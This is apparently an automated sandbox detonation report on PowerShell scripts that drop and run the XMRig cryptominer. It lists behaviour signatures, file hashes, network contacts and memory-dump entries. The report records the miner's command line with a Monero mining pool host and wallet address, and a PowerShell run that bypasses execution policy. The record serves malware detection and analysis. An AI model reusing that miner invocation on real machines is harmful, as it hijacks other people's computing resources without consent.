| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4896 wrote to memory of 4356 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4896 wrote to memory of 4356 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/4896-0-0x00007FFEA40A3000-0x00007FFEA40A4000-memory.dmp
memory/4896-5-0x0000013E22F60000-0x0000013E22F82000-memory.dmp
memory/4896-8-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp
memory/4896-9-0x0000013E23110000-0x0000013E23186000-memory.dmp
memory/4896-10-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kj1d2zw2.dpx.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4896-25-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp
memory/4896-48-0x0000013E23290000-0x0000013E232A2000-memory.dmp
memory/4896-61-0x0000013E23100000-0x0000013E2310A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4356-90-0x0000013D71B50000-0x0000013D71B70000-memory.dmp
memory/4356-91-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4896-93-0x00007FFEA40A3000-0x00007FFEA40A4000-memory.dmp
memory/4356-92-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4896-94-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp
memory/4896-95-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp
memory/4356-96-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-97-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-98-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-99-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-100-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-101-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-102-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-103-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-104-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-105-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-106-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-107-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-108-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-109-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-110-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-111-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-112-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-113-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-114-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-115-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-116-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-117-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-118-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-119-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-120-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-121-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-122-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-123-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-124-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-125-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-126-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-127-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-128-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-129-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-130-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-131-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-132-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-133-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-134-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-135-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-136-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-137-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-138-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-139-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-140-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-141-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-142-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-143-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-144-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-145-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-146-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-147-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-148-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-149-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-150-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-151-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-152-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-153-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-154-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-155-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
memory/4356-156-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:17
Platform
win10v2004-20240611-en
Max time kernel
1797s
Max time network
1783s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4852 wrote to memory of 4136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4852 wrote to memory of 4136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| GB | 95.101.143.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.16.208.104.in-addr.arpa | udp |
Files
memory/4852-0-0x00007FFDBC5E3000-0x00007FFDBC5E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0eootltk.0k2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4852-10-0x00000140FFE90000-0x00000140FFEB2000-memory.dmp
memory/4852-11-0x00007FFDBC5E0000-0x00007FFDBD0A1000-memory.dmp
memory/4852-12-0x00007FFDBC5E0000-0x00007FFDBD0A1000-memory.dmp
memory/4852-14-0x00007FFDBC5E0000-0x00007FFDBD0A1000-memory.dmp
memory/4852-15-0x00000140FFFC0000-0x00000140FFFD2000-memory.dmp
memory/4852-16-0x00000140FFE70000-0x00000140FFE7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4136-47-0x000002DBEF410000-0x000002DBEF430000-memory.dmp
memory/4136-48-0x000002DBF0E10000-0x000002DBF0E30000-memory.dmp
memory/4136-49-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4852-50-0x00007FFDBC5E0000-0x00007FFDBD0A1000-memory.dmp
memory/4136-52-0x000002DBF0E50000-0x000002DBF0E70000-memory.dmp
memory/4136-51-0x000002DBF0E30000-0x000002DBF0E50000-memory.dmp
memory/4852-54-0x00007FFDBC5E3000-0x00007FFDBC5E5000-memory.dmp
memory/4136-53-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-55-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4852-56-0x00007FFDBC5E0000-0x00007FFDBD0A1000-memory.dmp
memory/4136-57-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-59-0x000002DBF0E50000-0x000002DBF0E70000-memory.dmp
memory/4136-58-0x000002DBF0E30000-0x000002DBF0E50000-memory.dmp
memory/4136-60-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-61-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-62-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-63-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-64-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-65-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-66-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-67-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-68-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-69-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-70-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-71-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-72-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-73-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-74-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-75-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-76-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-77-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-78-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-79-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-80-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-81-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-82-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-83-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-84-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-85-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-86-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-87-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-88-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-89-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-90-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-91-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-92-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-93-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-94-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-95-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-96-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-97-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-98-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-99-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-100-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-101-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-102-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-103-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-104-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-105-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-106-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-107-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-108-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-109-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-110-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-111-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-112-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-113-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-114-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-115-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-116-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-117-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
memory/4136-118-0x00007FF663DA0000-0x00007FF6649D3000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win10v2004-20240508-en
Max time kernel
1678s
Max time network
1687s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/2544-0-0x00007FF9D55F3000-0x00007FF9D55F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_smhau4vx.uvb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2544-10-0x0000015174730000-0x0000015174752000-memory.dmp
memory/2544-11-0x00007FF9D55F0000-0x00007FF9D60B1000-memory.dmp
memory/2544-12-0x00007FF9D55F0000-0x00007FF9D60B1000-memory.dmp
memory/2544-13-0x00007FF9D55F0000-0x00007FF9D60B1000-memory.dmp
memory/2544-14-0x00007FF9D55F0000-0x00007FF9D60B1000-memory.dmp
memory/2544-15-0x00007FF9D55F3000-0x00007FF9D55F5000-memory.dmp
memory/2544-16-0x00007FF9D55F0000-0x00007FF9D60B1000-memory.dmp
memory/2544-17-0x00007FF9D55F0000-0x00007FF9D60B1000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:48
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
